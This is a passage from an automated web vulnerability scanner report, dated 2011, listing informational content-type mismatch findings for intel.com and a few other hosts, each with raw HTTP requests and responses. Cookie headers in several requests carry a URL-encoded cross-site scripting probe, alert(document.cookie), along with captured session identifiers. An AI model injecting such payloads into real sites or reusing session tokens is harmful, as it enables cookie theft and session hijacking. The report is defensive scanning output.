Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility,http%3A//itcenter.intel.com/ResourceLibrary%3F4b801%27%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E7e58a74ceab%3D1:%0A%09%0AIT%20Center%20Resource%20Library%0A%0A; s_lv=1296957106490; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3Aitcenter%3Aen_us%3Alibrary; s_sq=intelcorp%2Cintelcorpitcenter%2Cintelcorpcim%2Cintelcorpbus%2Cintelitcenterenus%3D%2526pid%253Dcim%25253Aitcenter%25253Aen_us%25253Alibrary%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/p/en_US/support%25253Fiid%25253Dhdr%25252Bsupport%2526ot%253DA%26intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA

Response

HTTP/1.1 200 OK
Content-Length: 35136
Content-Type: image/png
Last-Modified: Thu, 18 Nov 2010 23:13:20 GMT
Accept-Ranges: bytes
ETag: "06883307687cb1:43cd"
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Date: Sun, 06 Feb 2011 01:51:18 GMT
Connection: close

......JFIF.....d.d......Ducky.......2......Adobe.d..........................
..
.......................#"""#''''''''''.    ..    
   .        ...................................!! !!''''''''''...........
...[SNIP]...

24.17. http://www.intel.com/Assets/en_US/Image/spotlight/biz-itc-tab.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.intel.com
Path:   /Assets/en_US/Image/spotlight/biz-itc-tab.jpg

Issue detail

The response contains the following Content-type statement:
  • Content-Type: image/jpeg
The response states that it contains a JPEG image. However, it actually appears to contain a BMP image.

Request

GET /Assets/en_US/Image/spotlight/biz-itc-tab.jpg HTTP/1.1
Host: www.intel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/p/en_US/business?iid=gg_work-en_US+home_business_portal
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; s_cc=true; s_lv=1296947549093; s_lv_s=Less%20than%201%20day; cf=0; gpv_p18=cim%3A/index.htm; s_sq=%5B%5BB%5D%5D; countrylang=United%20States%20-%20English; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D

Response

HTTP/1.1 200 OK
Content-Length: 135686
Content-Type: image/jpeg
Last-Modified: Tue, 13 Jul 2010 23:14:35 GMT
Accept-Ranges: bytes
ETag: "807f5728e122cb1:4400"
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Date: Sat, 05 Feb 2011 23:12:08 GMT
Connection: close

BM........6...(.........................................................................................................................................................................................
...[SNIP]...

24.18. http://www.intel.com/sites/sitewide/hat/40recode/js/json.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.intel.com
Path:   /sites/sitewide/hat/40recode/js/json.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: application/x-javascript
The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /sites/sitewide/hat/40recode/js/json.js HTTP/1.1
Host: www.intel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/?en_US_01
X-Requested-With: XMLHttpRequest
Accept: text/javascript, application/javascript, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; s_lv=1296947549093; s_lv_s=Less%20than%201%20day; cf=0; gpv_p18=cim%3A/index.htm; s_sq=%5B%5BB%5D%5D; countrylang=United%20States%20-%20English

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Tue, 18 Jan 2011 03:36:26 GMT
Accept-Ranges: bytes
ETag: "0d97ce2c0b6cb1:43db"
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 23:12:07 GMT
Connection: close
Content-Length: 7032

...// v1.8(GH) 08Oct10
GAAT40.languages ={ countries:[ { name:'United Kingdom - English', localizedCountry:'United Kingdom (English)' }, { name:'Saudi Arabia - English', localizedCountry:'Saudi Ara
...[SNIP]...

24.19. http://www.intel.com/sites/sitewide/survey/onsitegeo.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.intel.com
Path:   /sites/sitewide/survey/onsitegeo.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: application/x-javascript
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /sites/sitewide/survey/onsitegeo.js HTTP/1.1
Host: www.intel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/p/en_US/business?iid=gg_work-en_US+home_business_portal
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; s_cc=true; s_lv=1296947549093; s_lv_s=Less%20than%201%20day; cf=0; gpv_p18=cim%3A/index.htm; s_sq=%5B%5BB%5D%5D; countrylang=United%20States%20-%20English; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Thu, 09 Jul 2009 21:48:31 GMT
Accept-Ranges: bytes
ETag: "b43a1f0df0ca1:4400"
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 23:12:08 GMT
Connection: close
Content-Length: 14

onSiteGeo='0';

24.20. http://www.intel.com/sitewide/js/portal-footer-merged-min.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.intel.com
Path:   /sitewide/js/portal-footer-merged-min.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: application/x-javascript
The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /sitewide/js/portal-footer-merged-min.js HTTP/1.1
Host: www.intel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/p/en_US/business?iid=gg_work-en_US+home_business_portal
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; s_cc=true; s_lv=1296947549093; s_lv_s=Less%20than%201%20day; cf=0; gpv_p18=cim%3A/index.htm; s_sq=%5B%5BB%5D%5D; countrylang=United%20States%20-%20English; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Fri, 10 Dec 2010 17:36:13 GMT
Accept-Ranges: bytes
ETag: "58e2b3bd9098cb1:43cf"
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Vary: Accept-Encoding
Date: Sat, 05 Feb 2011 23:12:08 GMT
Connection: close
Content-Length: 18798

..(.f.u.n.c.t.i.o.n.(.b.).{.b.(."...d.r.l.v.a.l. .i.m.g.".)...h.i.d.e.(.).;.v.a.r. .a.=.n.a.v.i.g.a.t.o.r...u.s.e.r.A.g.e.n.t...t.o.L.o.w.e.r.C.a.s.e.(.).;.i.f.(.a...i.n.d.e.x.O.f.(.".m.s.i.e.".).>.-.
...[SNIP]...

24.21. http://www.mobileworldcongress.com/
 previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.mobileworldcongress.com
Path:   /<BR/

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html
The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /<BR/ HTTP/1.1
Host: www.mobileworldcongress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:21:27 GMT
Connection: close
Content-Length: 34

<h1>Bad Request (Invalid URL)</h1>

24.22. http://www.w3.org/1999/XSL/Transform  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.w3.org
Path:   /1999/XSL/Transform

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html; charset=iso-8859-1
The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /1999/XSL/Transform HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:32:28 GMT
Server: Apache/2
Content-Location: Transform.html
Vary: negotiate,accept,Accept-Encoding
TCN: choice
Last-Modified: Wed, 12 May 2010 21:03:51 GMT
ETag: "7f3-4866bfa9c1bc0;b4-46552f8754040"
Accept-Ranges: bytes
Content-Length: 2035
Cache-Control: max-age=21600
Expires: Sun, 06 Feb 2011 05:32:28 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/html; charset=iso-8859-1

<?xml version="1.0" encoding="iso-8859-1"?>
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:rddl="http://www.rddl.org/" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<title>
...[SNIP]...

24.23. http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.w3.org
Path:   /TR/xhtml1/DTD/xhtml1-strict.dtd

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/plain
The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /TR/xhtml1/DTD/xhtml1-strict.dtd HTTP/1.1
Host: www.w3.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:32:28 GMT
Server: Apache/2
Content-Location: xhtml1-strict.dtd.raw
Vary: negotiate,accept-encoding,User-Agent
TCN: choice
Last-Modified: Thu, 01 Aug 2002 13:56:03 GMT
ETag: "6380-3a726d58522c0;475d1b7e9a540"
Accept-Ranges: bytes
Content-Length: 25472
Cache-Control: max-age=7776000
Expires: Fri, 06 May 2011 23:32:28 GMT
P3P: policyref="http://www.w3.org/2001/05/P3P/p3p.xml"
Connection: close
Content-Type: text/plain

<!--
Extensible HTML version 1.0 Strict DTD

This is the same as HTML 4 Strict except for
changes due to the differences between XML and SGML.

Namespace = http://www.w3.org/1999/xhtml


...[SNIP]...

25. Content type is not specified  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /p/ProductSelectionServlet/productselection

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /p/ProductSelectionServlet/productselection?level=1&locale=en_US&status=active HTTP/1.1
Host: www.intel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/p/en_US/support?iid=hdr+support
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; s_cc=true; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility,http%3A//itcenter.intel.com/ResourceLibrary%3F4b801%27%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E7e58a74ceab%3D1:%0A%09%0AIT%20Center%20Resource%20Library%0A%0A; s_lv=1296957106490; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3Aitcenter%3Aen_us%3Alibrary; s_sq=intelcorp%2Cintelcorpitcenter%2Cintelcorpcim%2Cintelcorpbus%2Cintelitcenterenus%3D%2526pid%253Dcim%25253Aitcenter%25253Aen_us%25253Alibrary%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/p/en_US/support%25253Fiid%25253Dhdr%25252Bsupport%2526ot%253DA%26intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Language: en-US
Content-Length: 2258
Server: IA Web Server
Date: Sun, 06 Feb 2011 01:55:18 GMT
Connection: close

{"numRows":10,"items":[{"supportURL":"http://support.intel.com/support/chipsets/","shortName":"chpsts","ActiveFlag":"Y","name":"Chipsets","status":"Active","langCode":"eng","id":40,"EOISFlag":"Y"},{"s
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Sun Feb 06 08:56:57 CST 2011.